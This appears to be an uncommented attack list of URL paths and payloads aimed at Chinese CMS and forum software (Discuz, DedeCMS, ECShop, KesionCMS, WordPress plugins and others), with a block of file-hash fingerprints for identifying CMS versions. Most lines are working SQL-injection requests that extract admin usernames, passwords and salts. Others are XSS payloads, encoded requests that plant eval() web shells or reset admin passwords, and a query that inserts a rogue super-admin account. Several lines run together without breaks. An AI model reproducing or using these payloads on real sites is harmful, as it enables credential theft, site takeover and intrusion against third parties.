/uc_server/control/admin/db.php
/source/plugin/myrepeats/table/table_myrepeats.php
/install/include/install_lang.php/shop.php?ac=view&shopid=4 and (select 1 from(select count(*),concat((select (select concat(0x7e,0×27,unhex(hex(database())),0×27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,password,0x3a,salt%29%20from%20uc_members%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23/respond.php?code=tenpay&attach=voucher&sp_billno=1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `ecs`.ecs_admin_user)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
/plus/ajaxs.asp?action=GetRelativeItem&key=search%2525%2527%2529%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2531%252c%2532%252c%2575%2573%2565%2572%256e%2561%256d%2565%252b%2527%257c%2527%252b%2570%2561%2573%2573%2577%256f%2572%2564%2520%2566%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500
/plus/Ajaxs.asp?action=GetRelativeItem&Key=goingta%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%2565%256C%2565%2563%2574%25201,2,username%252B%2527%257C%2527%252Bpassword%20from%20KS_Admin%2500
/user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C%2527%252Bpassword%2520from%2520KS_Admin%2500
/WordPr/wp-content/themes/twentyeleven/index.php
/wp-content/themes/twentyeleven/index.php
/wp-includes/js/swfupload/swfupload.swf?movieName="])}catch(e){if(!window.x){window.x=1;alert(/xss/)}}//
/wp-content/plugins/pinglunla/relay.php?sid=ec51555f3e5e125257457a73609bdbe15cb7c29d"></script><script>alert(0)</script><script%20src="
/wp-content/plugins/pinglunla/relay.php?sid=new sid here
/?s_p_c_t={Random id}&product_id={Random id}&view=showproduct&page_num={Random id}&back={Random id}/Z-Blog18/FUNCTION/c_urlredirect.asp?url=jxaxvxaxsxcxrxixpxtx%3Ax%22x%3Ex%3Cxsxcxrxixpxtx+xsxrxcx%3Dxhxtxtxpx%3Ax%2Fx%2Fx1×2×7x%2Ex0x%2Ex0x%2Ex1x%2Fx1x%2Exjxsx%3Ex%3Cx%2Fxsxcxrxixpxtx%3Ex4
/function/c_error.asp?errorid=7&number=0&description=&source=&sourceurl=javascript:alert(document.cookie
/admin/FCKeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
/catalog.asp?tags=Z-Blog"></title><script>alert('sebug')</script>
/admin/FCKeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php/cms/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,concat(admin_name,0x7C0D0A,pwd),concat(admin_name,0x7C0D0A,pwd)%20from%20blue_admin%20where%20admin_id=1/favicon.ico dedecms 7ef1f0a0093460fe46bb691578c07c95
/favicon.ico discuz c028c4822428e83a358c60a93ef65381
/favicon.ico Wordpress f420dc2c7d90d7873a90d82cd7fde315
/wp-content/themes/twentyten/images/wordpress.png Wordpress 3ead5afa19537170bb980924397b70d6
/admin/views/style/green/style.css emblog ef6ac4e36aaa30166bf15c5d42f88c2f
/favicon.ico emblog 80946c5e6ba9053e0b5b805deca75fd0
/htaccess.txt Joomla 479cce960362b0e17ca26f2c13790087
/components/com_mailto/views/sent/metadata.xml Joomla 66949cb107e35e0f8bc135499b47368e
/themes/README.txt Drupal afa129b3ed3028a3caffa545e2bbf6e5
/README.txt Drupal 904c8656ee4ace2a38b2f4e2a9fde68d
/favicon.ico ecshop dd5a528e5fd5d5e30b6ed81284ee3f45
/admin/help/zh_cn/database.xml ecshop 69c3771ecefbc3b8582e6b096325525c
/robots.txt Discuz 362ef88efd959694b37e6ac6b2013cb7
/static/image/admincp/logo.gif Discuz 86453e237f4e78c656095a4978175b57
/static/js/admincp.js Discuz b7d9174d54261a48fb7854d55fcb7852
/static/image/admincp/ajax_loader.gif Discuz aadf13a830af9d293e350b6c5297fdce
/static/image/admincp/bg_repno.gif Discuz 403889213f03534a0651d7cfd6878b2c
/base/templates/images/2.png phpweb b34179667ebcbe98b2be099a1391b5b0
/Admin/Include/version.xml kesioncms a4cc0e770cd13893d01c9d93b28f9903
/admin/Images/del.gif kesioncms 62d789a3c0e332b1b37adee5d95a5cee
/KS_Inc/common.js kesioncms d90f524d5c23735289df9b5b1d173315
/API/api.config kesioncms e02d907c78aa4b603bcb4884a6a4250b
/page/system/inc/fun.js kesioncms 2fa3d6243cc7a327dec5e214df973375
/Admin/Include/version.xml kesioncms a4cc0e770cd13893d01c9d93b28f9903
/KS_Inc/ajax.js kesioncms 703742511c08474004c2f3299e92709d
/favicon.ico shopex 5d1e8e3240474029bb6c8c3f4905b3e5
/js/close.gif aspcms 1f96a4dc1fd3761cbbc63160f4663bf6
/images/qq/qqkf2/Kf_bg03_03.gif aspcms fd5895d46be13038be5dffd88539cb45
/admin/image/title.gif 良精南方 03d2c478f7998aef487c593fb591b4dd
/e/tool/feedback/temp/test.txt 帝国cms 8eaf3eb0a904b0507199a644d1026fd7
/Vote/Img/skin/css_2/2_logo.gif 风讯 8a7af084aea04360163a28ad17385fe8
/dedecms51/plus/feedback_js.php?arcurl='' union select "'' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''''=''" from dede_admin where ''''=''/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
/plus/search.php?keyword=zhuba&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&TotalResult=%3Ciframe%20src=http://www.sitedir.com.cn%3E&PageNo=2http://www.sitedir.com.cn/member/login.php?gourl=%22%3E%3Ciframe%20src=http://www.sitedir.com.cn%3E/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`/uploads/plus/rss.php?tid=1&_Cs[][1]&_Cs[2%29%29%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT%20CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROMdede_admin%29,1%29%23%27][0]=1/ecshop/api/checkorder.php?username=%ce%27%20and%201=2%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23/ECShop/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php /page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html/admin.php?adminjob=apps&admintype=groups_manage&action=argument&keyword=1&ttable=/**/tm ON t.tid=tm.tid LEFT JOIN pw_argument a ON t.tid=a.tid LEFT JOIN pw_colonys c ON a.cyid=c.id WHERE (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),CONCAT(0x3a,(SELECT USER())))a from information_schema.tables group by a)b)%23/wp-admin/link-manager.php?orderby=[SQLinjection]&order=[SQL injection]/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,password,0x3a,salt%29%20from%20uc_members%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
/db/%23ruiutend%26anxiu.mdb/Admin/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/mk.asp&NewFolderName=mk.asp/User/User_Message.asp?Action=Del&ManageType=Inbox&MessageID=90/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\'and+char(@`'`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,concat(0x3C6162633E,group_concat(0x7C,userid,0x3a,pwd,0x7C),0x3C2F6162633E),5,6,7,8,9%20from%20`%23@__admin`%23"
/member/ajax_membergroup.php?action=post&membergroup=1
/member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@
/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=64&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=98&arrs2[]=97&arrs2[]=115&arrs2[]=101&arrs2[]=54&arrs2[]=52&arrs2[]=95&arrs2[]=100&arrs2[]=101&arrs2[]=99&arrs2[]=111&arrs2[]=100&arrs2[]=101&arrs2[]=40&arrs2[]=92&arrs2[]=39&arrs2[]=90&arrs2[]=110&arrs2[]=66&arrs2[]=49&arrs2[]=100&arrs2[]=72&arrs2[]=77&arrs2[]=111&arrs2[]=90&arrs2[]=109&arrs2[]=57&arrs2[]=119&arrs2[]=90&arrs2[]=87&arrs2[]=52&arrs2[]=111&arrs2[]=74&arrs2[]=121&arrs2[]=52&arrs2[]=117&arrs2[]=76&arrs2[]=50&arrs2[]=108&arrs2[]=117&arrs2[]=89&arrs2[]=50&arrs2[]=120&arrs2[]=49&arrs2[]=90&arrs2[]=71&arrs2[]=85&arrs2[]=118&arrs2[]=97&arrs2[]=87&arrs2[]=53&arrs2[]=106&arrs2[]=76&arrs2[]=50&arrs2[]=108&arrs2[]=117&arrs2[]=89&arrs2[]=49&arrs2[]=57&arrs2[]=109&arrs2[]=100&arrs2[]=87&arrs2[]=53&arrs2[]=102&arrs2[]=97&arrs2[]=71&arrs2[]=86&arrs2[]=115&arrs2[]=99&arrs2[]=67&arrs2[]=53&arrs2[]=119&arrs2[]=97&arrs2[]=72&arrs2[]=65&arrs2[]=110&arrs2[]=76&arrs2[]=67&arrs2[]=100&arrs2[]=51&arrs2[]=74&arrs2[]=121&arrs2[]=107&arrs2[]=115&arrs2[]=74&arrs2[]=122&arrs2[]=119&arrs2[]=47&arrs2[]=99&arrs2[]=71&arrs2[]=104&arrs2[]=119&arrs2[]=73&arrs2[]=71&arrs2[]=86&arrs2[]=50&arrs2[]=89&arrs2[]=87&arrs2[]=119&arrs2[]=111&arrs2[]=74&arrs2[]=70&arrs2[]=57&arrs2[]=81&arrs2[]=84&arrs2[]=49&arrs2[]=78&arrs2[]=85&arrs2[]=87&arrs2[]=50&arrs2[]=78&arrs2[]=116&arrs2[]=90&arrs2[]=70&arrs2[]=48&arrs2[]=112&arrs2[]=80&arrs2[]=122&arrs2[]=52&arrs2[]=110&arrs2[]=75&arrs2[]=84&arrs2[]=115&arrs2[]=61&arrs2[]=92&arrs2[]=39&arrs2[]=41&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35
/plus/ad_js.php?aid=1
/include/inc/inc_fun_help.php
/plus/search.php?keyword=xxx&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=102&arrs1[]=95&arrs1[]=115&arrs1[]=116&arrs1[]=121&arrs1[]=108&arrs1[]=101&arrs2[]=47&arrs2[]=46&arrs2[]=46&arrs2[]=47&arrs2[]=46&arrs2[]=46&arrs2[]=47&arrs2[]=100&arrs2[]=97&arrs2[]=116&arrs2[]=97&arrs2[]=47&arrs2[]=99&arrs2[]=111&arrs2[]=109&arrs2[]=109&arrs2[]=111&arrs2[]=110&arrs2[]=46&arrs2[]=105&arrs2[]=110&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=0
/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35
/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35
/data/admin/ver.txt
/plus/search.php?keyword=as&typeArr[ uNion ]=/User/i_Blog/PublicLogEdit.asp?id=2;insert%0D%0A%0D%0Ainto%20FS_MF_Admin%20(Admin_Name,Admin_Pass_Word,Admin_Is_Super)values(0x6F006C0064006A0075006E00,0x380033006100610034003000300
/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1admin_name345678++from+FS_MF_Admin 
/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1admin_pass_word345678++from+FS_MF_Admin
/User/i_Blog/PublicLogEdit.asp?id=2;insert%0D%0A%0D%0Ainto%20FS_MF_Admin%20(Admin_Name,Admin_Pass_Word,Admin_Is_Super)values(0x6F006C0064006A0075006E00,0x3800330061006100340030003000610066003400360034006300370036006400,1)--
/User/favorite.asp?Action= sort&id=1&classID=1
/stat/mystat.aspx?code='</script>")<iframe src='http://www.baidu.com' width='100%' height='100%' frameborder=no border=0>
/User/setnextoptions.asp?EquValue=1&ReqSql=select%201,ADMIN_pass_word,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20w/Search/Searc ... =0&keyword=1%25()=0%20oR%20''%25''=''&type=1
/editor/filem ... px%2Fconnector.aspx
/prompt/correct.aspx?t= 
/Search/Searc ... ype=1&keyword=1ay /e/member/list/index.php?sear=1&totalnum=1&keyboard=%D9'+union+select+1,1,1,concat(char2.(123),userid,char(95),username,char(95),password,char(125))+from+phome_enewsuser3. 
/e/member/list/index.php?sear=1&totalnum=1&keyboard=%D9'+union+select+1,1,1,concat(char2.(123),userid,char(95),username,char(95),password,char(125))+from+phome_enewsuser/*
/e/member/list/index.php?sear=1&totalnum=1&keyboard=%D9''+union+select+1,1,1,concat(char
(123),userid,char(95),username,char(95),password,char(125))+from+phome_enewsuser/*NewsType.asp?SmallClass=' union select 0,username+CHR(124)+password,2,3,4,5,6,7,8,9 from admin union select * from news where 1=2 and ''='/data_jk/joekoe_data.asp
/db/%23ruiutend%26anxiu.mdb

/database/NewCloud6.mdb
